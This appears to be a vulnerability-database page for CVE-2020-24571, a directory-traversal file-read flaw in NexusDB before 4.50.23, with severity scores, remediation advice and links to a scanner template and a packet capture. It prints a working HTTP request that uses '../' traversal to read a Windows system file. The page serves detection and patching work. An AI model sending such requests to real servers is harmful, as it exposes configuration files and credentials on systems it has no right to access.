🔙 목록으로 돌아가기

CVE-2020-24571: NexusDB <4.50.23 - Local File Inclusion

TitleNexusDB <4.50.23 - Local File Inclusion
Authorpikpikcu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
RemediationUpgrade NexusDB to version 4.50.23 or later to mitigate the LFI vulnerability.
CVSS Score7.5
EPSS Score0.9242
CVE IDCVE-2020-24571
CWE IDCWE-22
Tags cve cve2020 nexusdb lfi vuln

🔍 Vulnerability Description

NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.

🌐 HTTP Request

GET /../../../../../../../../windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-24571.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-24571.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A